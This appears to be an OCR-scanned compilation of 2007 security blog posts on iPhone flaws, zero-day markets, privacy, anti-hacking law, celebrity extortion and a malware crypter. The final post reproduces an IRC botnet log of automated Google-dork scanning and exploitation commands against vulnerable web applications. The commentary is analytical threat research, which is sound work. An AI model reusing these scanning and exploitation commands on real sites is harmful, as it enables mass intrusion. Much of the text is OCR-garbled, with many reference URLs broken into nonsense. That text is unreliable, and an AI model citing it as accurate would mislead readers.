Faster than you can say hacked! In the first days of what can be described as yet another 
case study on marketing buzz generation done by [1]evil brand managers, DVD Jon is coming 
up with [2]universal unlocking app for the iPhone, the folks at Errata Security join the party by 
announcing [3]several vulnerabilities within the device as well : 


"So far, Errata has found three main flaws in the long-awaited and much-hyped mobile 
phone/music/video player/mobile Web/email client device: a heap overflow bug in its Safari 
browser; a potential denial-of-service bug in its Bluetooth feature; and a data "seepage" bug 
that could cause seemingly innocuous data to be exposed by chatty client applications over a 
WiFi connection." 


And here’s someone [4]pen-testing the entire device to figure out that data is leaking 
out. On the compatibility front, this is already [5]proving quite handy, and regarding this 
[6]step-by-step disassembly of the iPhone, a factory manager in China is definitely in a good 
mood today. 
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Cartoon courtesy of [7]Caglecartoons. 


1. ftp: /Poogs.business9 .con/apple/2007/06/ehis~is-one-the_ ital 
2, http: / /manocr .u/2007/07/08/iphone-without-at#/ 

3. http://www. forbes. com/technology/2007/07/03/cx_0703darkreading . htm] 
4. http://www. andrew. cmu.edu/user/xsk/iPhoneSecuritySettings . html 
5 
6 
7 


. http: //www-personal.umich.edu/~mressl/webshel1/ 
. http: //www.ifixit .com/Guide/iPhone 


. http://www. caglecartoons.com/ 


3.7.3 Zero Day Vulnerabilities Auction (2007-07-06 13:43) 


Wabisabi Labi 


CLOSER TO ZER@ RISK 


Oferype | Bid | 
Linux Bidding 


ZD-00000007 10d 19h 59m Local Linux kemel memory leak 500€ 0 bid(s) info 
ZO-00000005 49m Yahoo! Messenger 8.1 remote buffer overflow © Windows XP Bidding | 2 000€0 bid(S) info 
Bidding 


ZD-00000004 104 19h 59m Squirrelmail GPG Plugin Command Exeoution Web application Baynoe at 


Theory and speculation, both finally materialize - an [1]Obay auction for security vulnerabil- 
ities was recently launched, aiming to reboot the currently not so financially favorable for 
researchers full disclosure model, and hopefully, create a win-win-win solution for Wabisabilabi, 
the vendors and the researchers themselves : 


"We decided to set up this portal for selling security research because although there are many 
researchers out there who discover vulnerabilities very few of them are able or willing to report 
it to the right people due to the fear of being exploited. Recently it was reported that although 
researchers had analyzed a little more than 7,000 publicly disclosed vulnerabilities last year, 
the number of new vulnerabilities found in code could be as high as 139,362 per year. Our 
intention is that the marketplace facility on WSLabi will enable security researchers 
to get a fair price for their findings and ensure that they will no longer be forced to 
give them away for free or sell them to cyber-criminals." 
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As I’ve been covering the topic of commercializing vulnerability research since I’ve started 
blogging, and my second post was related to Obay or "[2]How Realistic is the Market for Security 
Vulnerabilities?” I’ll briefly summarize the key points and let you deepen your knowledge into 
the topic by going through the previous posts related to buying and selling vulnerabilities, even 
requesting ones on demand - which is perhaps [3]the most sound market model in my opinion 
at least in respect to relevance. 


Back in December, 2005, the infamous [4]WMF vulnerability got sold for $4000 to be later 
on injected into popular sites, and embedded whereaver possible. The idea behind this 
attack? Take advantage of the window of opportunity by the time a patch by Microsoft is 
released, but instead of enjoying the typical advantage coming from full disclosure exploit 
and vulnerabilities sites, the attackers went a little further, they also wanted to make sure 
that the vulnerability wouldn’t even appear there at the first place. And while it later be- 
came a commodity, WMF DIY generators got released for the script kiddies to generate more 
noise and the puppet masters to remain safe behind a curtain of the click’n’infect kiddie crowd. 


Several months later, hinted by a person whose the perfect representation of the phrase "Those 


who talk know 

nothing, those who don’t talk they know" tipped me on [5]a zero day shop site - The Interna- 
tional Exploits Shop - that was using a push-model that is a basic listing of the vulnerabilities 
offered and the associated prices, even taking advantage of marketing surveys to figure out 
the median price customers [6]would be willing to pay for a zero day vulnerability. 


Commercializing vulnerability research the way the company is doing it, will inevitably demon- 
strate [7]the lack of communication and incentives model between all the parties in question. 
Moreover, if you think that a push-model from the researcher compared to a pull one, even on 
demand is better think twice - it isn’t. If I’m a vendor, I’d request a high profile vulnerability to 
be found in my Internet browser in the next two months and offer a certain financial incentive 
for doing so, compared to browsing through listings of vulnerabilities in products whose mar- 
ket share is near the 1 %. For the computer underground, or an information broker, there’s no 
such thing as a zero day vulnerability because they understand the idea that in times when 
everyone’s fuzzing more effectively than the vendors themselves, or transparency and social 
networking has never been better, a zero day to some is the last month’s zero day to others. 


Questions remain: 
922 


- how do you verify a vulnerability is really a zero day, when infomediaries such as iDefense, 
Zero Day Initiative or Digital Armaments [8]delay "yesterday’s" security vulnerability or keep 
you in [9]a "stay tuned" mode? How can you be sure you as an infomediary are not part of a 
scheme that’s supplying zero days to both the underground and you? 


- why put an emphasis on something’s that’s a commodity, but forgetting that closing a tem- 
porarily opened up window of opportunity posed by today’s zero day will lose its value in less 
than a minute by the time an IDS signature takes care of it while a patch is released? In exactly 
the very same fashion of [10]malicious economies of scale, a stolen personal and financial infor- 
mation is lossing value so that the attackers are trying to get rid of it as soon as possible, by the 
time it value doesn’t decrease to practically zero. Stay tuned for [11]a zero day vulnerabilities 
cash bubble. 


- how do you put a value on a vulnerability and what is your criteria? Of course, monocultural 
OSs get a higher priority, but does this mean that a zero day in MAC would get more bids 
because of the overall perception that it’s invincible and the verification of such vulnerability 
would generate endless media echo effect, while someone’s checking your current zero 
day propositions to see if the one he came across is still not listed there? For instance, 
[12]Wabisabilabi have posted a Call for iPhone vulnerabilities in the first days of their launch. 


Theoretically, if everyone starts selling zero day vulnerabilities they find, there will be 
people who will superficially [13]increase a zero day’s value by holding it back and keeping 
quiet for as long as someone doesn’t find it as well. Here’s an interview | took from [14]David 
Endler at the Zero Day Initiative you may find informative, and [15]more opinions on the 
topic - [16]Computerworld; [17]Dark Reading; [18]Slashdot; [19]The Register; [20]TechTarget; 
[21]Heise Security; [22]Techcrunch, and an interesting quote from a [23]BBC article that the 
initiative is aiming to limit the flow of vulnerabilities to the underground : 


"By rewarding researchers, the auction house aims to prevent flaws getting in to the hands of 
hi-tech criminals." 


It would have absolutely zero effect on the flow of vulnerabilities in computer underground 
circles, mostly because if someone likes the idea of getting a one time payment for its 
discovery, others would get a revenue stream for months to come by integrating it into the 
[24]underground ecosystem. Even the average [25]MPack attack kit, compared to others 
I’ve seen showcases the reality - a [26]huge number of people are infected and no zero day 
vulnerabilities are used but ones for which patches are available for months. Moreover, they 
don’t just buy stockpiles of zero day vulnerabilities, but are actively discovering new ones as 
well and holding them back for as long as possible as I’ve already mentioned. 


And another one from [27]CNET : 


WSLabi is backed by about 5 million euros ( $6.8 million) from individual investors, and hopes 
to float on a stock exchange (probably London’s AIM or a similar exchange in Oslo) in around 
18 months. " 


Is this for real, and if so, it makes it yet another investment in the information security 
market to keep an eye on in the very same fashion I’ve been [28]following and speculating 
on SiteAdvisor’s eventual, [29]now real acquisition. But WSLabi’s road to an IPO would be 
a very, very bumpy one. Everyone’s excluding the obvious, namely that the biggest and 
most targeted vendors could ruin WSLabi’s entire business model by starting to offer financial 
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incentives let’s call them for zero day vulnerabilities, or perhaps keep it pragmatic, namely 
ignore the fact that someone's trading with zero days regarding their products mainly because 
the vendors cannot be held liable for not providing patches in a timely manner or not reacting 
to the threat. 


Two projects worth considering are the ElseNot one, listing [30]exploits for every Microsoft 


vulnerability ever, and [31]eEye’s Zero Day Tracker, keeping track of unpatched vulnerabilities. 
Make sure what you wish for, so it doesn’t actually happen. 


. http: //www.wslabi.com/wabisabilabi/home.do? 


ttp://ddanchev. blogspot .com/2005/12/0bay-how-realistic-is-market-for.htm 


ttp://ddanchev. blogspot .com/2006/05/shaping-market-for-security.htm 


_netp://adanchev. blogspot .con/2006/04/sas~waf-vulnerability-purchased-for al 
_http://adanchey. blogepot .con/2006/03/sheres-ay-Odey-please, html 

_nttp:/ /adanchev. blogspot .con/2006/04/sild-vild-underground_25 bea 

| http://adanchey, blogspot .con/2006/03/eucceseful~ communication. heal 


ttp://ddanchev. blogspot .com/2006/05/delaying-yesterdays-Oday-security.htm 
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ttp://ddanchev. blogspot .com/2006/09/zero-day-initiative-upcoming-zero-day.htm 


10. http: //ddanchev. blogspot .com/2007/03/underground-economys-supply-of-goods .htm 


12. 
13, 


15. http: //www.matasano.com/log/901/zerobay-exists-will-the-juice-be-worth-the-squeeze/ 
16. http: //www.computerworld.com/action/article.do?command=viewArticleBasickarticleId=902636 


17. bttp://www.darkreading.com/document.asp?doc_id=1284114WT.svl=news2_1 


18. http://it.slashdot .org/it/07/07/06/0144234. shtm 
19. http://www.theregister.co.uk/2007/07/06/security_flaw_marketplace/ 


20. http://searchsecurity.techtarget.com/originalContent/0, 289142, sid14_gci1263402,00.htm 


21. 

22. http://www.techcrunch.com/2007/07/06/hackers-ebay-legitimate-marketplace-or-organized-blackmail/ 
23. 

24 

25. 

26. http: //ddanchev. blogspot .com/2007/06/massive-embedded-web-attack-in-italy.htm 
27. 
28. 
29. 

30. 

31. 
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3.7.4 Terrorist Groups’ Brand Identities (2007-07-09 16:02) 
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The author of this [1]terrorist groups’ logos compilation is greatly using business logos identity 
building analogy to discuss whether or not logos of terrorist groups successfully communicate 
their message or vision : 


"| did some research and rounded up as many logos as | could find from terrorist groups past 
and present. While | hate to give terrorists any more attention, | still think it’s interesting to 
see the various approaches they took in their logos, and wonder what considerations went 
into designing them. Does the logo successfully convey the organization’s message? Is it 
confusingly similar to another group’s logo? Does it exhibit excessive drop shadows, gradients, 
or use of whatever font is the Arabic equivalent of Papyrus?" 


And while it reminds me of another business analogy, namely a [2]A Cost-Benefit Analysis of 
Cyber Terrorism, such analogies clearly indicate two things - first, branding is something they 
are aware of, and second, they understand that evil advertising can easily turn into propa- 
ganda and a brainwashing tool given the numerous PR channels they already actively use - 
pretty much every Web 2.0 company that is out there. The screenshot above represents an 
advertisement of the [3]Mujahideen Secrets Encryption Tool, more screenshots of which you 
can find in a previous post. Despite that the tool is freely available for the wannabe jihadists 
to use, and that no one is ever going to receive a box-copy of it physically, GIMF took the time 
and effort to come up with a box-style software product ad realizing the basics of branding, 
namely that each and every contact with the brand - GIMF in this case - can either weaken or 
strengthen a brand’s image in the perception of the prospective user/customer. 


1. http://www.ironicsans.com/2007/07/terrorist_organization_logos.htm 


2. http: //ddanchev. blogspot .com/2006/10/cost-benefit-analysis-of-cyber.htm 
3. http://ddanchev. blogspot .com/2007/04/mujahideen-secrets-encryption-tool.htm 
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3.7.5 The Extremist Threat from Metallica (2007-07-09 16:24) 


MASTER OF PUPPETS 
No, this is serious - [1]James Hetfield from Metallica questioned by airport security personel 
before the Live Earth concert in London because of "taliban-like beard" : 


"According to British newspaper The Times, the rocker jetted into Luton airport ahead of Sat- 
urday’s Live Earth concert at Wembley Stadium - where his legendary rock band was due 
to perform - but was halted by officials before he could leave the terminal. The legendary 
frontman was then subjected to a brief line of questioning, after which security- 
conscious officials were left red-faced when Hetfield explained he was a member of 
a world-famous rock band." 


In 2007, [2]if you’re named Muhammad you'll be living the life of someone else’s stereotype 
that you’re a terrorist, and with a beard it’s even more suspicious, which is perhaps why [3]Mus- 
lims in the U.K started an anti-terror campaign "Not in Your Name" trying to distinguish them- 
selves from such simple and totally wrong stereotypes. 


1. http: //www.nzherald.co.nz/section/1501119/story.cfm?c_id=1501119&0bjectid=10450450 


2. http: //arabist .net/archives/2006/07/04/western-union-profiles-muslim-names/ 
3. http://news.bbc.co.uk/2/hi/uk_news/england/london/6275772. stm 


3.7.6 E-commerce and Privacy (2007-07-11 14:58) 


Privacy should be a main concern for everyone, not [1]because you have something to hide, 
but because you deserve it, it’s your right, while on the other hand, the thin line between 
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a sales department preservation of your purchasing history to later one contact you, or 
vice-versa to serve you better, is where the dilemma starts. Should you always have an 
opt-out capability, thus ruining someone’s marketing data aggregation model, or should you 
be willing to share it in order to receive a better customer experience? 


In a [2]recently conducted study, researchers at Carnegie Mellon University came to the 
conclusion that people are in fact willing to pay more when their privacy is ensured, but 
mind you - in [3]a merchant’s privacy policy only. Is this a feasible protective measure or 
just [4]Ja compliance-centered and automatically generated text you come across to on every 
merchant’s web site? Or how harsh is in fact reality in this case? 


" The study, led by Lorrie Cranor, director of the Carnegie Mellon Usable Privacy and Se- 
curity (CUPS) Lab, found that people were more likely to buy from online merchants with good 
privacy policies, as identified by Privacy Finder and were also willing to pay about 60 cents 
extra on a $15 purchase when buying from a site with a privacy policy they liked. " 


One of the most famous breaches of personal data aggregators that really made it all 
over the world was Choicepoint, a U.S based personal data aggregator. Famous mainly 
because of the huge number of affected individuals, which doesn’t mean a bigger breach 
hasn’t happened somewhere around the world already, the thing is, across the world it is 
still not very popular [5]to report a security breach, even regulated by law - perhaps even 
if you were you wouldn’t be able to report something you’re not aware of at the first place, 
would you? Looking at a merchant’s/data aggregator’s privacy policy given you have enough 
experience to detect the authentic policy from the automatically generated one you often see 
something like this line in [6]Choicepoint’s privacy policy for instance : 


" Once we receive personally-identifiable information, we take steps to protect its secu- 
rity on our systems. In the event we request or transmit sensitive information, such as credit 
card information or Social Security Numbers, we use industry standard, secure socket layer 
("SSL") encryption . We limit access to personally-identifiable information to those employees 
who need access in order to carry out their job responsibilities. " 


The same is the case with Amazon, Ebay and the rest of the E-commerce icons. In 2007, even 
phishers use SSL certificates to make their spoofs look more legitimate, and again in 2007 the 
majority of reported data breaches are due to [7]laptop losses compared to network or even 
insider related vulnerabilities. Therefore, even though compliance with law regarding the 
need for a privacy policy, having it doesn’t mean privacy of purchasing history and personal 
data wouldn’t get exposed. 


Common privacy assurance criteria on major merchant’s sites remain : 


- [8]TRUSTe certificate 
- [9]Hackersafe check 
- Compliance with industry standard security best practices 


Best practices are a necessary evil, evil because what they’re missing is exactly what 
attackers are exploiting - the pragmatic vulnerabilities to obtain the data in question com- 
pared to entering the target through the main door. Back in the times of the dotcom boom 
when Web 2.0’s mature business models were a VC’s dream come true, the overall perspective 
of Internet crime had to do with the concept of directly transferring funds from the a hacked 
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through network vulnerabilities bank, while in reality, from an attacker’s point of view it’s 
far more effective to target its customers directly. Which is exactly the same case with 
E-commerce and privacy, either the merchant will store your business relationship with them 
and expose it, or you will somehow leak it out. 


Whatever the case, a privacy policy is words, and common sense obviously remains a 
special mode of thinking for the majority of web shoppers. 


Related posts: 

[10]Afterlife Data Privacy 

[11]The Future of Privacy = Don’t Over-empower the Watchers 
[12]Anonymity or Privacy on the Internet? 

[13]U.K’s Telecoms Lack of Web Site Privacy 

[14]Big Brother Awards 2007 

[15]A Comparison of U.S and European Privacy Practices 


. http: //ssrn.com/abstract=99856 
. http: //pressesc.com/01181159576_price_of_privac 


ttp://ddanchev. blogspot .com/2006/11/to-publish-privacy-policy-or-not-to.htm 


http: //ddanchev. blogspot .com/2006/09/examining-internet-privacy-policies.htm 


_http:/ adanchev blogspot .con/2006/01/to-report~or-not-to-repor’. html 
_hetp://ehotcepoint .con/privacy ea] 
| http://adanchey blogspot. con/2007 /03/personal-data-security-breaches_htnl 
_ecp://wwy.eruate. org 

| Fctp:/ few ocanalert. con] 

10, http: //ddancher.blogepot on/2006/09/aiter1ite-data-privacy.hénll 

12, frep://ddanchey.blogepot .con/2006/01/anonyaity-ot~privacy-on-internet, ben 


13. http: //ddanchev.blogspot .com/2007/03/uk-telecoms-lack-of-web-site-privacy.htm 
14. http: //ddanchev.blogspot.com/2007/05/big-brother-awards- 2007 .htm 


15. http: //ddanchev. blogspot .com/2006/04/comparison-of-us-and-european-privacy.htm 
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3.7.7. Insecure Bureaucracy in Germany (2007-07-11 15:49) 


First, it was [1]data mining 22 million credit cards to see who purchased access to a set of 
child porn sites to figure out the obvious - that the accounts were purchased with stolen 
credit cards, and now, declaring that hacking tools are illegal is nothing more but creating 
a bureaucratic safe heaven on the local scene. And while pen-testers in Germany will do 
password cracking with a paper and a pen to verify their passwords best practices are indeed 
enforced and taken seriously, script kiddies that just compiled yet another 5GB rainbow table 
will [2]have a competitive advantage by default : 


"The distinctions between, for example, a password cracker and a password recovery tool, or 
a utility designed to run denial of service attacks and one designed to stress-test a network, 
are not properly covered in the legislation, critics argue. Taken as read, the law might even 
even make use of data recovery software to bypass file access permissions and gain access to 
deleted data potentially illegal." 


The idea is greatly hoping that Germany’s Internet is an isolated Intranet where if noone can 
have access to hacking tools than noone will be able to find vulnerable hosts and actually 
exploit them. But the reality is that it’s all a matter of perspective. By not wanting to conduct 
a security audit of your assets, and with the lack of any (detected) breaches, you’re enjoying a 
nice false sense of security. This story is a great example of bureaucrats evangelizing security 
through obscurity on a wide scale, where every single script kiddie on the other side of the world 
will have access to a commodity set of pen-testing tools to showcase age-old vulnerabilities 
in Germany’s infrastructure. Of course, you’re secure in your own twisted reality, but limiting 
access to pen-testing tools for a security consultant, and evil hacking programs to others, in 
order for you to improve security is nost just unpragmatic, but naive as well. Here’s [3]an 
interview with Marco Gercke, a local expert on the topic. 


This is not just a seperate case in Germany, to what looks like a growing trends with a previ- 
ous discussion on whether or not [4]German law enforcement should code and use malware 


929 


on a suspect’s PC, something by the way [5]the FBI is doing in the form of keyloggers to ob- 
tain passphrasess of impossible crack at least in respect to bruteforcing PGP and Hushmail 
accounts. So what could be a next? A law that would open up a cooperation with anti virus 
vendors doing business in the country in the form of either not detecting or delaying signa- 
tures of law enforcement coded malware? Or [6Jlaw enforcement will start bidding for zero 
day vulnerabilities right next to an intelligence agency without both of them knowing who’s 
the challenging bidder? 


Another bureaucratic development from the past is related to U.K’s perspective on [7]how to 
obtain access to encrypted material without coding malware and keyloggers - by requesting 
that everyone should provide their private encryption keys. It gets even more interesting with 
[8]Australia joining the trend by using spyware on suspects. 


Never let a bureaucrat do an ethical pen-tester’s job. 


Related articles: 


[9]Group: Anti-hacking laws can hobble Net security 


[10]Hacking or reverse engineering? 


http: //ddanchev. blogspot .com/2007/01/data-mining-credit-cards-for-child-porn.htm 


Noo 7 ees seueceg tocar osx /2007/ 0s a0 aac netbeans ia 
_hvtp://avs.securityfocus.com/columists/448 

http: //www.computerworld.com.au/index. php/id; 596622433 ; fp;4194304;fpid;1 

_nvtp://ness con. con/€301-10704_8-8741957-7- neal 

Roo ancncaey wloesee can 200 osc any atacand 

http: //ddanchev. blogspot .com/2006/06/all1-your-confidentiality-are-belong-to.htm 
cep: / asa co con/ Austral iantpol cet getgo- abeadvon‘epyvur4/ 7100-340, 3-CA01677 Wal 
_hvep://ews.securityfocus.com/nevs/11474 

10, http: //vebiog.infovorld.con/yager /archives/2007/07 hacking_or reve. all 
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3.7.8 Targeted Extortion Attacks at Celebrities (2007-07-17 15:28) 
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Who else wants to hack celebrities besides wannabe uber leet h4xOrs looking for fame while 
brute forcing with username "Philton" and using a common pet names dictionary word list? 
Digitally naughty paparazzi wanting to have celebrities do their work for them? Not necessarily 
as third-parties are looking for direct revenue streams out of obtaining personal and often 
devastating to a cebrity’s PR photos by [1]targeted hacking attacks combined with extortion 
attempts : 


"According to the police and S.M. Entertainment Friday, a 23-year-old college student was 
arrested for hacking a blog of singer BoA and blackmailing her, threatening to spread her 
private photos. The student, identified as Seo, sneaked onto BoA’s Cyworld blog in April 2006 
and obtained photos that she took with a male singer. He sent e-mails to her manager to 
threaten that he would release the photos if they did not provide money. He took 35 million 
won. S.M. Entertainment said in a press release that the victim was BoA and the male singer 
was Ahn Danny, former member of pop group g.o.d., and the two have been close friends." 


That type of extortion attacks are fundamentally flawed based on the attacker’s perspective 
that the stolen personal data is most valuable to the person who faces major privacy exposure, 
totally excluding the possibility to forward it to thirt parties such as the "yellow press". Timing 
as in [2]cryptoviral extortion is everything, for instance, a couple of million dollars PR campaign 
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positioning the singer as a vivid anti drugs and anti alcohol activities could turn into a fiasco 
if pictures of hear stoned and drunk to death leak at that very particular moment. Celebrity 
endorsement is always tricky, and the in very same way your brand can harness the popularity 
of a celebrity, your entire business model could become dependent on someone’s ability to 
manage stress, thus not getting involved into synthetic sins. 


Here’s yet another related story [3]this time targeting Linkin Park : 


"In a plea agreement, she said she was able to see the family’s photographs and travel plans, 
as well as 

information about a home they had purchased. She also read messages sent between Linkin 
Park’s record company and lawyer, including a copy of the band’s recording contract." 


Meanwhile, [4]more targeted attacks make their invisible rounds across the world : 


"On June 26, MessageLabs intercepted more than 500 individual email attacks targeted toward 
individuals in senior management positions within organizations around the world. The attack 
was so precisely addressed that the name and job title of the victim was included within the 
subject line of the email. An analysis of the positions targeted reveals that Chief Investment 
Officers accounted for 30 percent of the attacks, 11 percent were CEOs, ClOs accounted for 
almost seven percent and six percent were CFOs." 


For quite some time spammers have been segmenting and sort of data mining their harvested 
emails databases to not only get rid of fake emails and ones on purposely distributed by se- 
curity companies, but to also start offering lists on a per country, per city, even per company 
basis. In a Web 2.0 world, top management is actively networking in way never imagined be- 
fore, and despite that privacy through obscurity may seem a sound approach, someone out 
there will sooner or later get malware infected and have their HDD harvested for emails, thus 
exposing the what’s thought to be a private email for a top executive. | often come across such 
segmented propositions for specific emails of specific companies, and even more interesting, 
people are starting to request emails for certain companies only, so that they can directly tar- 
get the company in question with a typical zero day malware packed and crypted to the bottom 
of its binary brain. 


Despite all these emerging trends, we should never exclude the possibility for a guerilla mar- 
keting campaign based on a celebrity’s leak of personal, often nude personal data, a technique 
in the arsenal of the truly desperate. 


1. http: //www.asiamedia.ucla.edu/article-eastasia.asp?parentid=7197 


2. http://www. viruslist .com/en/weblog?weblogid=208187396 
3. http: //news .bbc.co.uk/1/hi/entertainment/6260592. stm 
4. http://www.messagelabs.com/resources/press/384 


932 


3.7.9 Bluetooth Movement Tracking (2007-07-18 11:45) 


€3} Bluetooth 


Passing by the local Hugo Boss store, all of a sudden you receive a SMS message - "It’s 
obvious you like out new suits collection since that’s the 5th time you pass by our store, and 
spend on average 15 seconds staring at them. So, why don’t you come inside and take a 
closer look for yourself?". Spooky? For sure, but with [1]bluetooth movement tracking to facil- 
iate purchases slowly emerging in the practices of evil marketers basically generating even 
more touch points with the assets in their brands’ portofolios, it’s something to keep an eye on: 


"When the project was deployed at the ZeroOne Festival is San Jose, California, the sys- 
tem sent attendees messages about where they had been and asked about their intentions for 
being there. For example, one such message read, “You were in a flower shop and spent 30 
minutes in the park; are you in love?” Those contacted were eventually led to the Loca kiosk 
where they could obtain a log of all their activities, which sometimes reached over 100m long. 
It should be noted that movement was only tracked on phones with discovery mode turned 
on." 
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Marketing research and faciliating purchases aren’t the only incentives for marketers and of 
course malicious attackers looking for innovative ways to socially engineer you to accept a 
bluetooth connection, even an attachment. Measuring the ROI of advertising and sales prac- 
tices that used to lack reliable metrics is becoming rather common, like for instance this [2]Big 
Brother style billboards that measure how many people actually looked at them : 


"If you’ve ever seen a poster in the mall that you’ve liked and stared at it for some time, 
chances are, that poster will be staring right back. This is, however, not so much of a "Big 
Brother" gimmick as much as it is a marketing tool. From xuuk, a Canadian-based company 
specializing in cutting-edge technology, comes the [3]eyebox2. This contraption is essentially 
a tiny video camera surrounded by infrared light-emitting diodes. It can record eye contact 
with 15-degree accuracy at a distance of up to 33 feet, so even a simple glance from someone 
in passing will be tallied into the score." 


| can certainly speculate that this technology will evolve in a way that it will be able to tell 
whether it was a male, or a female that looked at it, and if data from local stores gets syndicated 
to tell the system the prospective customer took notice of the store itself, it would provide the 
marketers with enough confidence to SMS you a discount offer valid in the next couple of hours 
only while you’re still somewhere around a local store. 


The [4]convergence of surveillance technologies is a fact, and what’s measuring the ROI of 
a marketing campaign to some, is an aggressive privacy violations for others. But as we’ve 
already seen the pattern of such technologies around the world, first they get legally abused, 
then customers suddenly turn into vivid privacy activists, to later on have the option to opt-in 
and opt-out so that everyone’s happy. 


1. http://w blustoothsource net/2007/05/loca-art~project-tracks-your-noveneata 
2. http: //www.nerdgrind. com/2007/06/12/the-billboards-are-watching-you/ 

3, beep: //w. wired. con/gadget.s/niscellaneous nevs/2007/06/eyetracking 

4. netp://adanchev. blogspot .con/2007/06/cel1-phone-stalking.htal 
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3.7.10 A Multi Feature Malware Crypter (2007-07-18 14:57) 
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Compared to the [1]malware [2]crypters | [3]covered in previous posts - part of the [4]Mali- 
cious Wild West series - this one is going way beyond the usual file obfuscation, and despite 
that it’s offered for sale and not in the wild yet, it includes anti-sandboxing, and anti-virtual 
machine capabilities, as malware authors started feeling the pressure posed by the two 
concepts when it comes to detecting their releases. 


Features include : 

- Add File to load on Memory 

- Add File to load on Browser 

- Add File to drop on Temp 

- Add File to drop on System 

- Add File to drop on Windows 

- Process injection 

- Different crypting routines on a per buyer basis 
- Mega icons pack with the purchase 


So let’s sum up, the [5]Jend user isn’t bothering to update her anti virus software signatures, 
and even if she did and despite [6]a vendor’s response time, the concept of zero day malware 
and rebooting the lifecycle of a malware release through crypting it, is sort of [7]ruining the 
signatures based scanning approach. Still living in the [8]suspicious file attachments world, 
the end user is easily falling victim into [9]web site embedded malware taking advantage of 
months old client side vulnerabilities in their web browser, media player and everything in 
between. [10]Botnet communication platforms are maturing, not with the idea to innovate, 
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but [11]to diversify the communications channels, and so are [12]malware embedding and 
[13]statistics kits. [14]OSINT through botnets given the amount of infected PCs is a fully sound 
practice, and so is [15]corporate espionage through botnets. 


Moreover, what used to a situation where malware authors were doing over their best 
to maintain their releases as invisible as possible, nowadays, malware is directly exploiting 
vulnerabilities within anti virus software to [16]evade detection or get rid of the anti virus 
software itself. In fact, [17]malware authors became so efficient so that vendors are coming 
up with very interesting stats based on the [18]greediest, [19]smallest, [20]largest and most 
malicious malware on a monthly basis. 


As always, the "best" is yet to come. 


. http: //ddanchev. blogspot .com/2007/03/shots-from-malicious-wild-west-sample_10.htm 


. http: //ddanchev. blogspot .com/2007/05/yet-another-malware-cryptor-in-wild.htm 
. http: //ddanchev. blogspot .com/2007/05/malware-loader-for-sale. html 


. http: //ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_25.htm 


. http: //ddanchev. blogspot .com/2006/08/virus-outbreak-response-time.htm 


. http: //ddanchev. blogspot .com/2006/01/why-relying-on-virus-signatures-simply.htm 


1 
2 
3 
4 
5. http: //ddanchev. blogspot .com/2006/07/anti-virus-signatures-update-it-could.htm 
6 
7 
2 
9 

10. 

1 
12. http: //ddanchev.blogspot .com/2007/06/massive-embedded-web-attack-in-italy htm 


13. http://ddanchev.blogspot .com/2007/06/mpack-kit-attack-on-video.htm 
14. http: //ddanchev.blogspot.com/2007/04/osint-through-botnets.htm 


15. http: //ddanchev.blogspot.com/2007/05/corporate-espionage-through- botnets. htm 
16. http://www.viruslist .com/en/analysis?pubid=204791949 
17. http: //ddanchev.blogspot.com/2007/03/underground- economys-supply-of-goods.htm 


18. http://www.viruslist .com/en/weblog?weblogid=208187399 
19. http://www.viruslist .com/en/weblog?weblogid=208187362 
//wow.viruslist .com/en/weblog?weblogid=20818732 
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3.7.11 SQL Injection Through Search Engines Reconnaissance (2007-07-19 14:58) 


<Scan_Google> [milw@rm] Joomla Component Expose <= RC35 Remote File Upload 
Vulnerability - http://www.milw6rm.com/exploits/4194 

<Scan_Google> [milw@rm] QuickEStore <= 8.2 (insertorder.cfm) Remote SQL Injection 
Vulnerability - http://www.milw6rm.com/exploits/4193 

<Scan_Google> [milw@rm] Vivuo CHS <= 3.4 (index.php) Remote BLIND SQL Injection 
Exploit - http://www.milw6rm.com/exploits/4192 

<Scan_Google> [milw@rm] Pictures Rating (index.php msgid) Remote SQL Injection 
VYulnerbility - http://www.nilw6rm.com/exploits/4191 

<Scan_Google> [milw@rm] Data Dynamics ActiveBar ActiveX (actbar3.ocx <= 3.1) 
Insecure Methods - http://www.milw6rm.com/exploits/4196 

<Scan_Google> [milw@rm] Expert Advisior (index.php id) Remote SQL Injection 
Vulnerbility - http://www.nilw6rm.com/exploits/4189 

<Scan_Google> [milw@rm] Flash Player/Plugin Video file parsing Remote Code 
Execution POC - http://www.milw6rm.com/exploits/4188 

<h3x8z501> tscan phpBB Module SupaNav 1.8.86 

<Scan_Google> [Scan] Started: phpBB - Dork: Module SupaNav 1.6.6 Engine: Google 

<Scan_Google> [Scan] Google Found: 156 Sites? 

<Scan_Google> [Scan] Cleaned results: 2 Sites? 

<Scan_Google> [Sean] Exploting started? 

<Scan_Google> [Scam] Scan Finished Module SupaNav 1.6.6 

<h3x8z501> tscan Flash Player/Plugin Video file parsing Remote Code Execution POC 

<Scan_Google> [Scam] Started: Flash - Dork: Player/Plugin Video file parsing Remote 
Code Execution POC Engine: Google 

<Scan_Google> [Scan] Google Found: 2679 Sites? 

<Scan_Google> [Scan] Cleaned results: 492 Sites? 

<Scan_Google> [Scan] Exploting started? 


In previous posts "[1]Google Hacking for Vulnerabilities" ; "[2]Google Hacking for Cryptographic 
Secrets" and "[3]Nation Wide Google Hacking Initiative" | emphasized on the concept of using 
search engines for reconnaissance purposes and for building hitlists of targets susceptible to 
remotely exploitable web application vulnerabilities. Yesterday, | came across to an IRC based 
botnet C &C and the bots activities follow in the form of screenshots and summary of the 
reconnaissance approaches used. 


- Remotely exploitable SQL injection vulnerabilities act as the infection vector 


- Taking advantage of the most popular search engines’ indexes, vulnerable sites and web 
pages get automatically 
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<Scan_Google> [Help] Scan Command : tscan <bug> <dork> 

<Scan_Google> [Help] Milw6rm Latest exploits : tmilw6rn 

<h3x8z501> tmilw6rn 

<Scan_Google> [milw@rm] Latest exploits : 

<Scan_Google> [milw@rm] A-shop <= 6.76 Remote File Deletion Vulnerability - 
http://www .mnilw6érm.com/exploits/4198 

<Scan_Google> [milw@rm] phpBB Module SupaNay 1.6.6 (link_main.php) RFI 
Vulnerability - http://www.milw6rm.com/exploits/4197 

<Scan_Google> [milw@rm] Asterisk < 1.2.22 / 1.4.8 / 2.2.1 chan_skinny Remote 
Denial of Service - http://www.milw6rm.com/exploits/4196 

<Scan_Google> [milw@rm] BBS E-Market (postscript.php p_mode) Remote File Inclusion 
Vulnerability - http://wow.milw6rm.com/exploits/4195 

<Scan_Google> [milw@rm] Joomla Component Expose <= RC35 Remote File Upload 
Vulnerability - http://www.mnilw6rm.com/exploits/4194 

<Scan_Google> [milw@rm] QuickEStore <= 8.2 (insertorder.cfm) Remote SQL Injection 
Vulnerability - http://wow.milw6rm.com/exploits/4193 

